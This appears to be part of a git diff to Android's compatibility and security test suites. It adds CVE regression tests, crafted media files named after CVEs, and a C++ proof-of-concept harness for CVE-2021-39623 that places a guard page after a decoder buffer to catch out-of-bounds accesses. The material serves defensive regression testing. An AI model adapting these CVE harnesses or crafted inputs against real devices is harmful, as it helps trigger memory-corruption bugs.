-rw-r--r--tests/framework/base/windowmanager/util/src/android/server/wm/TestTaskOrganizer.java45
-rw-r--r--tests/framework/base/windowmanager/util/src/android/server/wm/TouchHelper.java6
-rw-r--r--tests/framework/base/windowmanager/util/src/android/server/wm/WindowManagerStateHelper.java8
-rw-r--r--tests/inputmethod/src/android/view/inputmethod/cts/InputMethodManagerTest.java33
-rw-r--r--tests/inputmethod/src/android/view/inputmethod/cts/util/MockTestActivityUtil.java171
-rw-r--r--tests/location/location_fine/src/android/location/cts/fine/LocationManagerFineTest.java1
-rw-r--r--tests/tests/media/Android.bp1
-rw-r--r--tests/tests/media/src/android/media/cts/MediaSessionTest.java47
-rw-r--r--tests/tests/security/Android.bp3
-rw-r--r--tests/tests/security/AndroidManifest.xml15
-rw-r--r--tests/tests/security/AndroidTest.xml4
-rw-r--r--tests/tests/security/aidl/android/security/cts/IBitmapService.aidl1
-rw-r--r--tests/tests/security/res/raw/cve_2022_22083.apebin0 -> 1037 bytes
-rw-r--r--tests/tests/security/res/raw/cve_2022_22084.qcpbin0 -> 635676 bytes
-rw-r--r--tests/tests/security/res/raw/cve_2022_22085.dtsbin0 -> 3237753 bytes
-rw-r--r--tests/tests/security/res/raw/cve_2022_22086.3gpbin0 -> 80749 bytes
-rw-r--r--tests/tests/security/res/raw/cve_2022_22087.mkvbin0 -> 227777 bytes
-rw-r--r--tests/tests/security/res/raw/cve_2022_25657.mkvbin0 -> 3784 bytes
-rw-r--r--tests/tests/security/res/raw/cve_2022_25659.mkvbin0 -> 299217 bytes
-rw-r--r--tests/tests/security/res/xml/syncadapter.xml19
-rw-r--r--tests/tests/security/src/android/security/cts/BitmapService.java5
-rw-r--r--tests/tests/security/src/android/security/cts/BitmapTest.java14
-rw-r--r--tests/tests/security/src/android/security/cts/CVE_2019_9376.java3
-rw-r--r--tests/tests/security/src/android/security/cts/CVE_2022_20135.java67
-rw-r--r--tests/tests/security/src/android/security/cts/CVE_2022_20358/CVE_2022_20358.java120
-rw-r--r--tests/tests/security/src/android/security/cts/CVE_2022_20358/PocContentProvider.java56
-rw-r--r--tests/tests/security/src/android/security/cts/CVE_2022_20358/PocSyncService.java79
-rw-r--r--tests/tests/security/src/android/security/cts/LocationDisabledAppOpsTest.java132
-rw-r--r--tests/tests/security/src/android/security/cts/PackageInstallerTest.java7
-rw-r--r--tests/tests/security/src/android/security/cts/PackageManagerTest.java99
-rw-r--r--tests/tests/security/src/android/security/cts/PermissionReviewTapjackingTest.kt173
-rw-r--r--tests/tests/security/src/android/security/cts/RunningAppProcessInfoTest.java29
-rw-r--r--tests/tests/security/src/android/security/cts/StagefrightTest.java108
-rw-r--r--tests/tests/security/test-apps/DummyTargetApi15TestApp/Android.bp27
-rw-r--r--tests/tests/security/test-apps/DummyTargetApi15TestApp/AndroidManifest.xml21
-rw-r--r--tests/tests/security/test-apps/HelperAppOverlay/Android.bp31
-rw-r--r--tests/tests/security/test-apps/HelperAppOverlay/AndroidManifest.xml32
-rw-r--r--tests/tests/security/test-apps/HelperAppOverlay/src/android/permission3/cts/helper/overlay/OverlayActivity.kt26
-rw-r--r--tests/tests/security/test-apps/UsePermissionApp22_2/Android.bp27
-rw-r--r--tests/tests/security/test-apps/UsePermissionApp22_2/AndroidManifest.xml79
-rw-r--r--tests/tests/telecom/Android.bp1
-rw-r--r--tests/tests/telecom/AndroidTest.xml1
-rw-r--r--tests/tests/telecom/CarModeTestAppSelfManaged/Android.bp38
-rw-r--r--tests/tests/telecom/CarModeTestAppSelfManaged/AndroidManifest.xml59
-rw-r--r--tests/tests/telecom/CarModeTestAppSelfManaged/src/android/telecom/cts/carmodetestappselfmanaged/CtsCarModeInCallServiceControlSelfManaged.java22
-rw-r--r--tests/tests/telecom/CarModeTestAppSelfManaged/src/android/telecom/cts/carmodetestappselfmanaged/CtsCarModeInCallServiceSelfManaged.java22
-rw-r--r--tests/tests/telecom/aidl/android/telecom/cts/carmodetestapp/ICtsCarModeInCallServiceControl.aidl2
-rw-r--r--tests/tests/telecom/src/android/telecom/cts/PhoneAccountRegistrarTest.java461
-rw-r--r--tests/tests/telecom/src/android/telecom/cts/carmodetestapp/CtsCarModeInCallServiceControl.java19
-rw-r--r--tests/tests/telephonyprovider/src/android/telephonyprovider/cts/MmsPartTest.java13
-rw-r--r--tools/cts-media-preparer-app/src/android/mediastress/cts/preconditions/app/MediaPreparerAppTest.java6
358 files changed, 8274 insertions, 1786 deletions
diff --git a/apps/MainlineModuleDetector/Android.mk b/apps/MainlineModuleDetector/Android.mk
deleted file mode 100644
index a0ccc3cfe7a..00000000000
--- a/apps/MainlineModuleDetector/Android.mk
+++ /dev/null
@@ -1,40 +0,0 @@
-#
-# Copyright (C) 2019 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-
-LOCAL_PATH:= $(call my-dir)
-include $(CLEAR_VARS)
-
-LOCAL_MODULE_TAGS := optional
-
-LOCAL_MODULE_PATH := $(TARGET_OUT_DATA_APPS)
-
-LOCAL_STATIC_JAVA_LIBRARIES := compatibility-device-util-axt
-
-# Disable dexpreopt and <uses-library> check for test.
-LOCAL_ENFORCE_USES_LIBRARIES := false
-LOCAL_DEX_PREOPT := false
-
-LOCAL_SRC_FILES := $(call all-java-files-under, src)
-
-LOCAL_PACKAGE_NAME := MainlineModuleDetector
-LOCAL_LICENSE_KINDS := SPDX-license-identifier-Apache-2.0
-LOCAL_LICENSE_CONDITIONS := notice
-
-LOCAL_SDK_VERSION := current
-
-LOCAL_COMPATIBILITY_SUITE := cts general-tests sts
-
-include $(BUILD_CTS_PACKAGE)
diff --git a/apps/MainlineModuleDetector/OWNERS b/apps/MainlineModuleDetector/OWNERS
deleted file mode 100644
index 8f076a82482..00000000000
--- a/apps/MainlineModuleDetector/OWNERS
+++ /dev/null
@@ -1,3 +0,0 @@
-# Bug component: 195645
-manjaepark@google.com
-mspector@google.com \ No newline at end of file
diff --git a/apps/MainlineModuleDetector/src/com/android/cts/mainlinemoduledetector/MainlineModuleDetector.java b/apps/MainlineModuleDetector/src/com/android/cts/mainlinemoduledetector/MainlineModuleDetector.java
deleted file mode 100644
index 01c02c774cd..00000000000
--- a/apps/MainlineModuleDetector/src/com/android/cts/mainlinemoduledetector/MainlineModuleDetector.java
+++ /dev/null
@@ -1,49 +0,0 @@
-/*
- * Copyright (C) 2019 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-package com.android.cts.mainlinemoduledetector;
-
-import android.app.Activity;
-import android.content.pm.PackageManager;
-import android.os.Bundle;
-import android.util.Log;
-
-import com.android.compatibility.common.util.mainline.MainlineModule;
-import com.android.compatibility.common.util.mainline.ModuleDetector;
-
-import java.util.HashSet;
-import java.util.Set;
-
-public class MainlineModuleDetector extends Activity {
-
- private static final String LOG_TAG = "MainlineModuleDetector";
-
- @Override
- public void onCreate(Bundle savedInstanceState) {
- super.onCreate(savedInstanceState);
- try {
- PackageManager pm = getApplicationContext().getPackageManager();
- Set<MainlineModule> modules = ModuleDetector.getPlayManagedModules(pm);
- Set<String> moduleNames = new HashSet<>();
- for (MainlineModule module : modules) {
- moduleNames.add(module.packageName);
- }
- Log.i(LOG_TAG, "Play managed modules are: <" + String.join(",", moduleNames) + ">");
- } catch (Exception e) {
- Log.e(LOG_TAG, "Failed to retrieve modules.", e);
- }
- this.finish();
- }
-}
diff --git a/hostsidetests/media/bitstreams/AndroidTest.xml b/hostsidetests/media/bitstreams/AndroidTest.xml
index 070b44ddcf3..c07fa07eb9e 100644
--- a/hostsidetests/media/bitstreams/AndroidTest.xml
+++ b/hostsidetests/media/bitstreams/AndroidTest.xml
@@ -25,6 +25,11 @@
<option name="dynamic-config-name" value="cts-dynamic-config" />
<option name="version" value="9.0_r1"/>
</target_preparer>
+ <target_preparer class="com.android.compatibility.common.tradefed.targetprep.DynamicConfigPusher">
+ <option name="target" value="device" />
+ <option name="config-filename" value="CtsMediaBitstreamsTestCases" />
+ <option name="version" value="9.0_r1"/>
+ </target_preparer>
<target_preparer class="com.android.compatibility.common.tradefed.targetprep.MediaPreparer">
<option name="media-download-only" value="true" />
</target_preparer>
@@ -32,11 +37,6 @@
<option name="cleanup-apks" value="true" />
<option name="test-file-name" value="CtsMediaBitstreamsDeviceSideTestApp.apk" />
</target_preparer>
- <target_preparer class="com.android.compatibility.common.tradefed.targetprep.DynamicConfigPusher">
- <option name="target" value="device" />
- <option name="config-filename" value="CtsMediaBitstreamsTestCases" />
- <option name="version" value="9.0_r1"/>
- </target_preparer>
<target_preparer class="com.android.compatibility.common.tradefed.targetprep.ReportLogCollector">
<option name="src-dir" value="/sdcard/report-log-files/"/>
<option name="dest-dir" value="report-log-files/"/>
diff --git a/hostsidetests/securitybulletin/Android.bp b/hostsidetests/securitybulletin/Android.bp
index 7770ebde437..ec98710e6c1 100644
--- a/hostsidetests/securitybulletin/Android.bp
+++ b/hostsidetests/securitybulletin/Android.bp
@@ -23,7 +23,6 @@ java_test_host {
java_resource_dirs: ["res"],
// tag this module as a cts test artifact
test_suites: [
- "cts",
"general-tests",
"sts",
],
@@ -38,6 +37,7 @@ java_test_host {
cc_defaults {
name: "cts_hostsidetests_securitybulletin_defaults",
+ auto_gen_config: false,
compile_multilib: "both",
multilib: {
lib32: {
@@ -54,7 +54,6 @@ cc_defaults {
},
},
test_suites: [
- "cts",
"sts",
"general-tests",
],
diff --git a/hostsidetests/securitybulletin/res/cve_2021_39623.ogg b/hostsidetests/securitybulletin/res/cve_2021_39623.ogg
new file mode 100644
index 00000000000..1992a17f915
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2021_39623.ogg
Binary files differ
diff --git a/hostsidetests/securitybulletin/res/cve_2022_22082.dsf b/hostsidetests/securitybulletin/res/cve_2022_22082.dsf
new file mode 100644
index 00000000000..60d1a5afbbc
--- /dev/null
+++ b/hostsidetests/securitybulletin/res/cve_2022_22082.dsf
Binary files differ
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-39623/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-39623/Android.bp
new file mode 100644
index 00000000000..50662fdeae6
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-39623/Android.bp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+cc_test {
+ name: "CVE-2021-39623",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ header_libs: [
+ "libmediametrics_headers",
+ ],
+ shared_libs: [
+ "libstagefright",
+ "libdatasource",
+ "libutils",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2021-39623/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2021-39623/poc.cpp
new file mode 100644
index 00000000000..d9e38baa633
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2021-39623/poc.cpp
@@ -0,0 +1,99 @@
+/*
+ * Copyright (C) 2022 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include "../includes/common.h"
+#include <datasource/DataSourceFactory.h>
+#include <dlfcn.h>
+#include <gui/SurfaceComposerClient.h>
+#include <media/IMediaHTTPService.h>
+#include <media/stagefright/InterfaceUtils.h>
+#include <media/stagefright/MediaCodecList.h>
+#include <media/stagefright/MediaExtractorFactory.h>
+#include <media/stagefright/SimpleDecodingSource.h>
+#include <sys/mman.h>
+
+typedef void *(*mmap_t)(void *, size_t, int, int, int, off_t);
+mmap_t real_mmap = nullptr;
+
+using namespace android;
+
+bool testInProgress = false;
+constexpr size_t kTargetBufferSize = 32768;
+struct sigaction new_action, old_action;
+void sigsegv_handler(int signum, siginfo_t *info, void *context) {
+ if (testInProgress && info->si_signo == SIGSEGV) {
+ (*old_action.sa_sigaction)(signum, info, context);
+ return;
+ }
+ exit(EXIT_FAILURE);
+}
+
+void *mmap(void *addr, size_t length, int prot, int flags, int fd,
+ off_t offset) {
+ real_mmap = (mmap_t)dlsym(RTLD_NEXT, "mmap");
+ if (!real_mmap) {
+ exit(EXIT_FAILURE);
+ }
+ if (length == kTargetBufferSize) {
+ char *tmp_ptr = (char *)real_mmap(addr, length + PAGE_SIZE, prot,
+ flags | MAP_ANONYMOUS, -1, offset);
+ mprotect(tmp_ptr + length, PAGE_SIZE, PROT_NONE);
+ return tmp_ptr;
+ }
+ return real_mmap(addr, length, prot, flags, fd, offset);
+}
+
+int main(int argc, char **argv) {
+ FAIL_CHECK(argc > 1);
+ sigemptyset(&new_action.sa_mask);
+ new_action.sa_flags = SA_SIGINFO;
+ new_action.sa_sigaction = sigsegv_handler;
+ sigaction(SIGSEGV, &new_action, &old_action);
+
+ sp<DataSource> dataSource = DataSourceFactory::getInstance()->CreateFromURI(
+ nullptr /* httpService */, argv[1]);
+ FAIL_CHECK(dataSource);
+
+ sp<IMediaExtractor> extractor = MediaExtractorFactory::Create(dataSource);
+ FAIL_CHECK(extractor);
+
+ sp<MediaSource> mediaSource =
+ CreateMediaSourceFromIMediaSource(extractor->getTrack(0));
+ FAIL_CHECK(mediaSource);
+
+ sp<MediaSource> rawSource = SimpleDecodingSource::Create(
+ mediaSource, MediaCodecList::kPreferSoftwareCodecs, nullptr, nullptr,
+ false);
+ FAIL_CHECK(rawSource);
+
+ status_t err = rawSource->start();
+ FAIL_CHECK(err == OK);
+
+ MediaSource::ReadOptions options = {};
+ MediaBufferBase *buffer = nullptr;
+
+ testInProgress = true;
+ rawSource->read(&buffer, &options);
+ testInProgress = false;
+ if (buffer) {
+ buffer->release();
+ buffer = nullptr;
+ }
+ options.clearSeekTo();
+ options.setSeekTo(0);
+ rawSource->stop();
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
index c8e8cbfe049..bef0e9a7558 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/AdbUtils.java
@@ -23,6 +23,7 @@ import com.android.compatibility.common.util.ResultUnit;
import com.android.ddmlib.IShellOutputReceiver;
import com.android.ddmlib.NullOutputReceiver;
import com.android.ddmlib.CollectingOutputReceiver;
+import com.android.sts.common.tradefed.testtype.SecurityTestCase;
import com.android.tradefed.device.DeviceNotAvailableException;
import com.android.tradefed.device.ITestDevice;
import com.android.tradefed.device.NativeDevice;
@@ -261,48 +262,6 @@ public class AdbUtils {
}
/**
- * Enables malloc debug on a given process.
- *
- * @param processName the name of the process to run with libc malloc debug
- * @param device the device to use
- * @return true if enabling malloc debug succeeded
- */
- public static boolean enableLibcMallocDebug(String processName, ITestDevice device) throws Exception {
- device.executeShellCommand("setprop libc.debug.malloc.program " + processName);
- device.executeShellCommand("setprop libc.debug.malloc.options \"backtrace guard\"");
- /**
- * The pidof command is being avoided because it does not exist on versions before M, and
- * it behaves differently between M and N.
- * Also considered was the ps -AoPID,CMDLINE command, but ps does not support options on
- * versions before O.
- * The [^]] prefix is being used for the grep command to avoid the case where the output of
- * ps includes the grep command itself.
- */
- String cmdOut = device.executeShellCommand("ps -A | grep '[^]]" + processName + "'");
- /**
- * .hasNextInt() checks if the next token can be parsed as an integer, not if any remaining
- * token is an integer.
- * Example command: $ ps | fgrep mediaserver
- * Out: media 269 1 77016 24416 binder_thr 00f35142ec S /system/bin/mediaserver
- * The second field of the output is the PID, which is needed to restart the process.
- */
- Scanner s = new Scanner(cmdOut).useDelimiter("\\D+");
- if(!s.hasNextInt()) {
- CLog.w("Could not find pid for process: " + processName);
- return false;
- }
-
- String result = device.executeShellCommand("kill -9 " + s.nextInt());
- if(!result.equals("")) {
- CLog.w("Could not restart process: " + processName);
- return false;
- }
-
- TimeUnit.SECONDS.sleep(1);
- return true;
- }
-
- /**
* Pushes and installs an apk to the selected device
*
* @param pathToApk a string path to apk from the /res folder
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Bug_182282630.java b/hostsidetests/securitybulletin/src/android/security/cts/Bug_182282630.java
index 0822c75c100..6a259b4e744 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Bug_182282630.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Bug_182282630.java
@@ -16,19 +16,20 @@
package android.security.cts;
-import static org.junit.Assume.assumeTrue;
import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Before;
+import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-
@RunWith(DeviceJUnit4ClassRunner.class)
-public final class Bug_182282630 extends SecurityTestCase {
+public final class Bug_182282630 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.BUG_182282630";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "BUG-182282630.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Bug_182808318.java b/hostsidetests/securitybulletin/src/android/security/cts/Bug_182808318.java
index 57e26353662..52f680efe13 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Bug_182808318.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Bug_182808318.java
@@ -21,14 +21,15 @@ import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Before;
+import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-
@RunWith(DeviceJUnit4ClassRunner.class)
-public final class Bug_182808318 extends SecurityTestCase {
+public final class Bug_182808318 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.BUG_182808318";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "BUG-182808318.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Bug_182810085.java b/hostsidetests/securitybulletin/src/android/security/cts/Bug_182810085.java
new file mode 100644
index 00000000000..b461fae5608
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Bug_182810085.java
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeTrue;
+
+import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class Bug_182810085 extends NonRootSecurityTestCase {
+ private static final String TEST_PKG = "android.security.cts.BUG_182810085";
+ private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
+ private static final String TEST_APP = "BUG-182810085.apk";
+
+ @Before
+ public void setUp() throws Exception {
+ assumeTrue(
+ "not an Automotive device",
+ getDevice().hasFeature("feature:android.hardware.type.automotive"));
+ uninstallPackage(getDevice(), TEST_PKG);
+ }
+
+ @Test
+ @AsbSecurityTest(cveBugId = 182810085)
+ public void testRunDeviceTestsPassesFull() throws Exception {
+ installPackage(TEST_APP);
+ // Grant permission to draw overlays.
+ getDevice().executeShellCommand(
+ "pm grant " + TEST_PKG + " android.permission.SYSTEM_ALERT_WINDOW");
+ assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "testTapjacking"));
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183410508.java b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183410508.java
index e3dd727793c..1295a85f1a9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183410508.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183410508.java
@@ -16,19 +16,20 @@
package android.security.cts;
-import static org.junit.Assume.assumeTrue;
import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Before;
+import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-
@RunWith(DeviceJUnit4ClassRunner.class)
-public final class Bug_183410508 extends SecurityTestCase {
+public final class Bug_183410508 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.BUG_183410508";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "BUG-183410508.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183411210.java b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183411210.java
index d59fce4e74f..fac7d0e8f61 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183411210.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183411210.java
@@ -21,6 +21,7 @@ import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
import org.junit.Before;
@@ -28,7 +29,7 @@ import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public final class Bug_183411210 extends SecurityTestCase {
+public final class Bug_183411210 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.BUG_183411210";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "BUG-183411210.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183411279.java b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183411279.java
index df7556c45b3..bbcd64c16fd 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183411279.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183411279.java
@@ -16,19 +16,20 @@
package android.security.cts;
-import static org.junit.Assume.assumeTrue;
import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Before;
+import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-
@RunWith(DeviceJUnit4ClassRunner.class)
-public final class Bug_183411279 extends SecurityTestCase {
+public final class Bug_183411279 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.BUG_183411279";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "BUG-183411279.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183613671.java b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183613671.java
index 75bbd0ac298..f0b6568d57e 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183613671.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183613671.java
@@ -23,10 +23,10 @@ import org.junit.Test;
import org.junit.Before;
import org.junit.runner.RunWith;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
@RunWith(DeviceJUnit4ClassRunner.class)
-public final class Bug_183613671 extends StsExtraBusinessLogicHostTestBase {
+public final class Bug_183613671 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.BUG_183613671";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "BUG-183613671.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183794206.java b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183794206.java
index 73cfdb9762d..8045838cfb1 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183794206.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183794206.java
@@ -16,19 +16,20 @@
package android.security.cts;
-import static org.junit.Assume.assumeTrue;
import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeTrue;
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Before;
+import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-
@RunWith(DeviceJUnit4ClassRunner.class)
-public final class Bug_183794206 extends SecurityTestCase {
+public final class Bug_183794206 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.BUG_183794206";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "BUG-183794206.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183963253.java b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183963253.java
index adf6103043a..7b183b387d9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Bug_183963253.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Bug_183963253.java
@@ -25,10 +25,10 @@ import org.junit.Before;
import org.junit.runner.RunWith;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import com.android.sts.common.tradefed.testtype.StsExtraBusinessLogicHostTestBase;
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
@RunWith(DeviceJUnit4ClassRunner.class)
-public final class Bug_183963253 extends StsExtraBusinessLogicHostTestBase {
+public final class Bug_183963253 extends NonRootSecurityTestCase {
private static final String TEST_PKG = "android.security.cts.BUG_183963253";
private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
private static final String TEST_APP = "BUG-183963253.apk";
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Bug_187957589.java b/hostsidetests/securitybulletin/src/android/security/cts/Bug_187957589.java
index 84ae1149b3c..5580acb598f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Bug_187957589.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Bug_187957589.java
@@ -15,15 +15,19 @@
*/
package android.security.cts;
+
import static org.junit.Assume.assumeFalse;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Bug_187957589 extends SecurityTestCase {
+public class Bug_187957589 extends NonRootSecurityTestCase {
/**
* b/187957589
* Vulnerability Behaviour: out of bounds write in noteAtomLogged for negative atom ids.
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java
index 4ee8a5e1833..a4b8506aed2 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2016_2182.java
@@ -15,15 +15,20 @@
*/
package android.security.cts;
+
+import static org.junit.Assume.assumeFalse;
+
